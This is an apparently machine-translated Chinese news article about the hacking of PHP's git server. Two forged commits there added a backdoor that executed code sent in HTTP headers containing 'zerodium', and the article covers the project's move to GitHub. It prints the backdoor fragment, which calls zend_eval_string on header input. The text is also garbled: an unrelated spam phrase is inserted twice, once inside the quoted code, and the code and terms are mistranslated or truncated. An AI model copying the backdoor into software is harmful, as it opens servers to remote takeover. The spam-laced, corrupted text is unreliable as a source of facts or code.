该开源项目的成员说，一名黑客入侵了用于分发PHP编程语言的服务器，并在源代码中添加了后门，使网站容易被完全接管。

周末向PHP Git服务器推送的两次更新增加了一行代码，如果由PHP驱动的网站运行，沐鸣开户测速那么将允许没有授权的访问者执行他们选择的代码。这里和这里的恶意提交将代码的代码注入功能提供给在HTTP报头中有“zerodium”字样的访问者。

PHP.net被黑，代码后门

提交是在两个著名的PHP开发人员Rasmus Lerdorf和Nikita Popov的账户下提交的。Popov在周日晚上发布的一份通知中写道:“我们还不知道这到底是怎么发生的，但一切都指向git.php.net服务器的问题(而不是个人git账户的问题)。”

在妥协之后，Popov说PHP维护者已经得出结论，他们独立的Git基础设施是一个不必要的安全风险。因此，他们将停止git.php.net服务器，并使GitHub成为PHP存储库的官方源。今后，所有PHP源代码的更改将直接在GitHub上进行，而不是在git.php.net上。

不迟于周日晚，Markus Staab、Jake Birchallf和Michael Voříšek等开发人员在审查周六做出的承诺时，恶意更改引起了公众的注意。这次更新是在一个使用勒道夫名字的账户下进行的，目的是修复一个拼写错误。在第一次发现之后不久，Voříšek发现了第二次恶意提交，它是在Popov的帐户名下进行的。它声称要恢复以前的拼写修复。

两次提交都添加了相同的代码行:

onvert_to_string (enc);

if (strstr(Z_STRVAL_P(enc)， "zerodium")) {

zend_try {

zend_eval_string(Z_STRVAL_P(enc)+8, NULL，沐鸣开户测速"REMOVETHIS: sold to zerodium, mid 2017");

Zerodium是一家中间商，从研究人员那里购买漏洞，然后把它们卖给政府机构，用于调查或其他目的。为什么提交引用Zerodium还不清楚。该公司首席执行官Chaouki Bekrar周一在推特上说，Zerodium没有参与此事。

“为在今天的PHP git中输入‘Zerodium’的巨魔干杯，”他写道。“显然，我们与此事无关。很可能，发现这个漏洞的研究人员试图把它卖给许多实体，但没有人想买这个垃圾，所以他们把它烧了。

坏业力

在此之前，PHP组在他们自己的git服务器http://git.php.net/上处理对存储库的所有写访问，使用的是Popov称之为“自成的”系统Karma。根据以前的贡献，它为开发人员提供了不同级别的访问特权。与此同时，GitHub一直是一个镜像存储库。

现在，PHP团队正在放弃自托管和管理的git基础设施，用GitHub取代它。这一变化意味着GitHub现在是“规范的”存储库。PHP组将不再使用Karma系统。相反，贡献者将不得不成为GitHub上PHP组织的一部分，并且必须使用具有提交能力的账户的双重身份验证。

本周末的事件并不是第一次为了实施供应链攻击而攻破php.net服务器。2019年初，在发现黑客用一个恶意的包管理器替换了主包管理器后，广泛使用的PHP扩展和应用程序库临时关闭了大部分站点。小组的开发人员说，任何在过去六个月下载过包管理器的人都应该得到一个新的副本。

大约80%的网站使用PHP。目前还没有关于网站将恶意更改合并到其生产环境中的报告。

网络发现平台Rumble的联合创始人兼首席执行官HD Moore说，做出这些改变的人可能是想炫耀自己对PHP Git服务器的未授权访问，而不是试图真正使用PHP的后门网站。

“听起来像是攻击者在挑衅Zerodium，或者试图给人留下这种代码被后门入侵的印象，”他告诉Ars。“不管怎样，如果我对PHP有任何安全方面的兴趣，我将花费大量的时间来检查以前的提交。”